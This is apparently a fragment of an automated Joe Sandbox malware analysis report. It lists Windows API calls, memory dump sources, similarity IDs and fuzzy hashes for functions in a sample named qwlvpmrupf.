                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: 2cd306eb4de262b7ee6f38b62e769711c627da37fd2606eb3f6baf6e48c30ae3
                                                • Instruction ID: 6c05a1b000b674734a65b4c0d54f7c61b6460a0cd23b9cb1b440a324864dce80
                                                • Opcode Fuzzy Hash: 2cd306eb4de262b7ee6f38b62e769711c627da37fd2606eb3f6baf6e48c30ae3
                                                • Instruction Fuzzy Hash: 0D110C3AD00218FFDB129BA5DD85F9EBB78EF18750F210092E600B7290D6716F10DB94
                                                APIs
                                                  • Part of subcall function 00372441: GetWindowLongW.USER32(00000000,000000EB), ref: 00372452
                                                • GetClientRect.USER32(?,?), ref: 0040A890
                                                • GetCursorPos.USER32(?), ref: 0040A89A
                                                • ScreenToClient.USER32(?,?), ref: 0040A8A5
                                                • DefDlgProcW.USER32(?,00000020,?,00000000,?), ref: 0040A8D9
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Client$CursorLongProcRectScreenWindow
                                                • String ID:
                                                • API String ID: 4127811313-0
                                                • Opcode ID: e6bbadc67d10896edc9b3fa936ede406a742486ad8b9241f8b38efd3dec6a803
                                                • Instruction ID: 31290844f0c34bf0f63862d1c0d59c7932763e19a0829b024ba0d2c4eaeae020
                                                • Opcode Fuzzy Hash: e6bbadc67d10896edc9b3fa936ede406a742486ad8b9241f8b38efd3dec6a803
                                                • Instruction Fuzzy Hash: CA113A72900219EFDF14EF95D9459EE77B8EB05300F108466F911F3190D738BA96CBAA
                                                APIs
                                                • GetCurrentThreadId.KERNEL32 ref: 003DEA29
                                                • MessageBoxW.USER32(?,?,?,?), ref: 003DEA5C
                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 003DEA72
                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 003DEA79
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                • String ID:
                                                • API String ID: 2880819207-0
                                                • Opcode ID: c38aa62db4b48e1e49bdc0911f86b67f7d227e8daa6ab3cb41a0ba503fc92a6d
                                                • Instruction ID: a0abf740ad95f43bff0bcb255cb9f4daffd9496743b7e43459dd57150d9ae830
                                                • Opcode Fuzzy Hash: c38aa62db4b48e1e49bdc0911f86b67f7d227e8daa6ab3cb41a0ba503fc92a6d
                                                • Instruction Fuzzy Hash: A4110876900259BBC702AFB8AD05A9B7FBDAB46310F004226F824E7390D6B48D0487A0
                                                APIs
                                                • GetWindowRect.USER32(?,?), ref: 00408792
                                                • ScreenToClient.USER32(?,?), ref: 004087AA
                                                • ScreenToClient.USER32(?,?), ref: 004087CE
                                                • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 004087E9
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: ClientRectScreen$InvalidateWindow
                                                • String ID:
                                                • API String ID: 357397906-0
                                                • Opcode ID: 050532de7558a6c3caf70fa877dd230d77afe944b647ec130767197e8a9695c7
                                                • Instruction ID: 6ca2930b73fe9a70d98d8093519daad8dfe2aaf9c9c4abd909d06d19f26d7281
                                                • Opcode Fuzzy Hash: 050532de7558a6c3caf70fa877dd230d77afe944b647ec130767197e8a9695c7
                                                • Instruction Fuzzy Hash: E81142B9D00209EFDB41CFA8C984AEEBBF9FB08310F108166E915E3214D735AA54CF54
                                                APIs
                                                • GetSysColor.USER32(00000008), ref: 0037216C
                                                • SetTextColor.GDI32(?,?), ref: 00372176
                                                • SetBkMode.GDI32(?,00000001), ref: 00372189
                                                • GetStockObject.GDI32(00000005), ref: 00372191
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Color$ModeObjectStockText
                                                • String ID:
                                                • API String ID: 4037423528-0
                                                • Opcode ID: 75537914af14759ca70407bc0b890d96b53daa44db3b6f1a4a41804465178180
                                                • Instruction ID: b3ff623ca7b88e358a1b74a331e345b5efedc624e0bea5cdf8d7ce9aafb2845d
                                                • Opcode Fuzzy Hash: 75537914af14759ca70407bc0b890d96b53daa44db3b6f1a4a41804465178180
                                                • Instruction Fuzzy Hash: 74E09B31680640BEDB225FB4AC097ED7B20AB56339F05C225F7FA580E1C77146449B10
                                                APIs
                                                • GetDesktopWindow.USER32 ref: 003CEBD6
                                                • GetDC.USER32(00000000), ref: 003CEBE0
                                                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 003CEC00
                                                • ReleaseDC.USER32(?), ref: 003CEC21
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                • String ID:
                                                • API String ID: 2889604237-0
                                                • Opcode ID: 201b09a7c41757c584348a508966e198ea4dcb4cf593c50ce3065e50c72b09c8
                                                • Instruction ID: 344b1a1aafc57d92ef3420fbb6ea073f040eaf053ac67e0a52013d730fae17ae
                                                • Opcode Fuzzy Hash: 201b09a7c41757c584348a508966e198ea4dcb4cf593c50ce3065e50c72b09c8
                                                • Instruction Fuzzy Hash: A9E01AB4C00201DFCB51AFE08908A6DBBB5FB48310F10C859E81AF3210CB3959459F08
                                                APIs
                                                • GetDesktopWindow.USER32 ref: 003CEBEA
                                                • GetDC.USER32(00000000), ref: 003CEBF4
                                                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 003CEC00
                                                • ReleaseDC.USER32(?), ref: 003CEC21
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                • String ID:
                                                • API String ID: 2889604237-0
                                                • Opcode ID: f57e7ba46627356cd61d756bdca0ac123c5a3b7835d30cf5010b9042e6330c09
                                                • Instruction ID: d7f1d3080d0add8f223cdc54281e2175f0d55d37ee2834fe3fcd9cece82435ba
                                                • Opcode Fuzzy Hash: f57e7ba46627356cd61d756bdca0ac123c5a3b7835d30cf5010b9042e6330c09
                                                • Instruction Fuzzy Hash: E2E01AB0C00200DFCB51AFA08908A6DBBB5BB48310F108859E91EB3210C73959059F04
                                                APIs
                                                • __startOneArgErrorHandling.LIBCMT ref: 0039E69D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: ErrorHandling__start
                                                • String ID: pow
                                                • API String ID: 3213639722-2276729525
                                                • Opcode ID: 6c4102e1cd4f6ba30793f45dfeeaa27d63f080d07eac0a09e959a993cd23cd84
                                                • Instruction ID: 9b92a4e375102d732d15d803404fd73598c29b8b9819d6040746a55f5de53c5f
                                                • Opcode Fuzzy Hash: 6c4102e1cd4f6ba30793f45dfeeaa27d63f080d07eac0a09e959a993cd23cd84
                                                • Instruction Fuzzy Hash: FD516C61E0820296DF13FB14CD013BE2BA4EB52741F358D69F0D5862E9EF358CD69B4A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: #
                                                • API String ID: 0-1885708031
                                                • Opcode ID: 8e9d7f912e5bc137093689e0f0ff913cf278292fd1fa5c4341c5a25ac2ea10ec
                                                • Instruction ID: 6320446979cb32ebc340eb63029af2185a13670c87237a08947beebcd583bcaa
                                                • Opcode Fuzzy Hash: 8e9d7f912e5bc137093689e0f0ff913cf278292fd1fa5c4341c5a25ac2ea10ec
                                                • Instruction Fuzzy Hash: EF51033550834ADFDF2AEF29C440BBA77A4EF15310F66409AE891DB290DB349E42C761
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: BuffCharUpper_wcslen
                                                • String ID: CALLARGARRAY
                                                • API String ID: 157775604-1150593374
                                                • Opcode ID: 3cee7f633cee267b5753f3c2286802ae20978d894e363dd8de34ea1ee48c5877
                                                • Instruction ID: 925f655af18f05d8519ed51fc5c0c7c27d26ac4540eec3dbf20ec2e9c63669ff
                                                • Opcode Fuzzy Hash: 3cee7f633cee267b5753f3c2286802ae20978d894e363dd8de34ea1ee48c5877
                                                • Instruction Fuzzy Hash: E141B371A002199FCB15EFA8C8868FEBBB5FF59310F15406AE506AB353EB749D81CB50
                                                APIs
                                                • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00404F7E
                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00404F93
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID: '
                                                • API String ID: 3850602802-1997036262
                                                • Opcode ID: 098766efd6793684c7e8de854835f00c3767c648433ffc7b46b9543c59010a98
                                                • Instruction ID: 335103a81333562ec47380351023c85b6e373a237a063395ef6a1a02bec50024
                                                • Opcode Fuzzy Hash: 098766efd6793684c7e8de854835f00c3767c648433ffc7b46b9543c59010a98
                                                • Instruction Fuzzy Hash: CC312CB4A0130A9FDB14CFA9C980BDA7BB5FF89304F10417AEA05AB391D774A941CF94
                                                APIs
                                                  • Part of subcall function 0037771B: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00377759
                                                  • Part of subcall function 0037771B: GetStockObject.GDI32(00000011), ref: 0037776D
                                                  • Part of subcall function 0037771B: SendMessageW.USER32(00000000,00000030,00000000), ref: 00377777
                                                • GetWindowRect.USER32(00000000,?), ref: 004040D9
                                                • GetSysColor.USER32(00000012), ref: 004040F3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                • String ID: static
                                                • API String ID: 1983116058-2160076837
                                                • Opcode ID: 22ef7fb4c1f2a40f1563e6b7924cf6f12b90f3205da99c21d122e154f410ed4d
                                                • Instruction ID: f51fc881e7262e2a4a889d34feffe5d417ea85b88258031dd60a0409b7b6e749
                                                • Opcode Fuzzy Hash: 22ef7fb4c1f2a40f1563e6b7924cf6f12b90f3205da99c21d122e154f410ed4d
                                                • Instruction Fuzzy Hash: C0116A72610209AFDB00DFA8CC45AFA7BB8FB48314F004929FE55E3290E678E851DB64
                                                APIs
                                                  • Part of subcall function 0037B25F: _wcslen.LIBCMT ref: 0037B269
                                                  • Part of subcall function 003D4536: GetClassNameW.USER32(?,?,000000FF), ref: 003D4559
                                                • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 003D25DC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: ClassMessageNameSend_wcslen
                                                • String ID: ComboBox$ListBox
                                                • API String ID: 624084870-1403004172
                                                • Opcode ID: 85821ead07cff2ddee9539fa417f4b8402b1dcdc324210e7005d9ef33595fe86
                                                • Instruction ID: 7b7e2f0e4a8a82d37fb7f485283597d94d9f5e51096c56b4b4bb55e75dee915b
                                                • Opcode Fuzzy Hash: 85821ead07cff2ddee9539fa417f4b8402b1dcdc324210e7005d9ef33595fe86
                                                • Instruction Fuzzy Hash: C901F972600115ABCB16EB64EC15DFFF779AF66310B04461AE862573D6EB3458088750
                                                APIs
                                                  • Part of subcall function 0037B25F: _wcslen.LIBCMT ref: 0037B269
                                                  • Part of subcall function 003D4536: GetClassNameW.USER32(?,?,000000FF), ref: 003D4559
                                                • SendMessageW.USER32(?,00000180,00000000,?), ref: 003D24D6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: ClassMessageNameSend_wcslen
                                                • String ID: ComboBox$ListBox
                                                • API String ID: 624084870-1403004172
                                                • Opcode ID: 3c79f8bca389c3fc87d54670743dd77e37a87007c2e9cae54fabae016ddb312d
                                                • Instruction ID: 796cc2f3411c121f7adf196e1f1d991165492a939d280d95ffb0eb63277cccbb
                                                • Opcode Fuzzy Hash: 3c79f8bca389c3fc87d54670743dd77e37a87007c2e9cae54fabae016ddb312d
                                                • Instruction Fuzzy Hash: F301FC72A0010567CB26EBA0D911FFFB7B89F55300F140017B84267382DB249E08C671
                                                APIs
                                                  • Part of subcall function 0037B25F: _wcslen.LIBCMT ref: 0037B269
                                                  • Part of subcall function 003D4536: GetClassNameW.USER32(?,?,000000FF), ref: 003D4559
                                                • SendMessageW.USER32(?,00000182,?,00000000), ref: 003D2558
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: ClassMessageNameSend_wcslen
                                                • String ID: ComboBox$ListBox
                                                • API String ID: 624084870-1403004172
                                                • Opcode ID: 7020e313a9e7a26c2cd7e498ef1fd119311f6d84f60ca3ceb3133f4d26014a58
                                                • Instruction ID: d3356822c86078378e5fe1b72edd215f4ed4727e15f83eff15c07794e831ce86
                                                • Opcode Fuzzy Hash: 7020e313a9e7a26c2cd7e498ef1fd119311f6d84f60ca3ceb3133f4d26014a58
                                                • Instruction Fuzzy Hash: 2601A772A4010567CB26EBA4E915FFFF7B99F26740F144016B44177386EA289F088671
                                                APIs
                                                  • Part of subcall function 0037B25F: _wcslen.LIBCMT ref: 0037B269
                                                  • Part of subcall function 003D4536: GetClassNameW.USER32(?,?,000000FF), ref: 003D4559
                                                • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 003D2663
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: ClassMessageNameSend_wcslen
                                                • String ID: ComboBox$ListBox
                                                • API String ID: 624084870-1403004172
                                                • Opcode ID: fc28bec0e417e569249336d086a23df2012ab9d232fccb9da11cafdce4bea715
                                                • Instruction ID: 3be0e03ab8fd137cab80d89bf589b8a2923aa46d4f3225fbb97285957bc711d7
                                                • Opcode Fuzzy Hash: fc28bec0e417e569249336d086a23df2012ab9d232fccb9da11cafdce4bea715
                                                • Instruction Fuzzy Hash: 7CF0F972A40215A7C726E7A4AC51FFFB778AF11710F040916B462673C2DBB498088664
                                                APIs
                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00444018,0044405C), ref: 00408B1E
                                                • CloseHandle.KERNEL32 ref: 00408B30
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: CloseCreateHandleProcess
                                                • String ID: \@D
                                                • API String ID: 3712363035-456115274
                                                • Opcode ID: c1eb662a6657570a45d406fd5c6d937d76e974d1a2edeb3ec3685b01f792e187
                                                • Instruction ID: 1f91f813065c6883ea3c41ad7a607fdf3f7a5ba4558f93a578b1ae26b0d31a21
                                                • Opcode Fuzzy Hash: c1eb662a6657570a45d406fd5c6d937d76e974d1a2edeb3ec3685b01f792e187
                                                • Instruction Fuzzy Hash: B0F05EB6940704BBF7206BA0AC46FB73A9CDB46751F004031BB08EA192D67A4C6492BC
                                                APIs
                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00402C8B
                                                • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00402C9E
                                                  • Part of subcall function 003DF1A7: Sleep.KERNEL32 ref: 003DF21F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: FindMessagePostSleepWindow
                                                • String ID: Shell_TrayWnd
                                                • API String ID: 529655941-2988720461
                                                • Opcode ID: ace7b865051b7b90475dba5a856b6d2ec1a20e065eacf387629a383d691dc2c9
                                                • Instruction ID: fd85acc2fa9cf60343d2ba5e5f3fc44f5de5762a89998ccbe9d6ef80b33420b3
                                                • Opcode Fuzzy Hash: ace7b865051b7b90475dba5a856b6d2ec1a20e065eacf387629a383d691dc2c9
                                                • Instruction Fuzzy Hash: FBD0A936784300BAF228B3B0ED0FFCA6A04AB40B00F000922724AAA1C0CAB0A801C688
                                                APIs
                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00402CCB
                                                • PostMessageW.USER32(00000000), ref: 00402CD2
                                                  • Part of subcall function 003DF1A7: Sleep.KERNEL32 ref: 003DF21F
                                                Strings
                                                Memory Dump Source
